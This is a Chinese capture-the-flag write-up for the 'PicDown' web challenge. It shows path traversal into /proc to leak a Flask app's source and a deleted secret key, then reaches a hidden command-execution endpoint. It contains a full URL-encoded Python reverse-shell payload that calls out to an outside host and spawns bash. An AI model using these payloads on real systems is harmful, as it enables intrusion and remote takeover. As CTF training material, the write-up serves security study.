[白虎组]PicDown

直接请求拿flag
非预期了，正解：
?url=../../../proc/self/cmdline
看到用py2执行了app.py，读取文件：
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
​
app = Flask(__name__)
​
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
​
​
@app.route('/')
def index():
    return render_template('search.html')
​
​
@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)
​
​
@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"
​
    return res
​
​
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
可以看到获得了secret.txt文件，但是已经被删除了，可以在/proc/pid/fd/读取，这个目录包含了进程打开的每一个文件的链接，3可以读取到secret.txt。
要反弹shell，比较棘手。
/no_one_know_the_manager?key=2e3658a3c99be231c2b3b0cc260528c4&shell=python%20-c%20%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22xx.xx.xx.xx%22,8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27
[朱雀组]phpweb
[朱雀组]Nmap
Last modified 8mo ago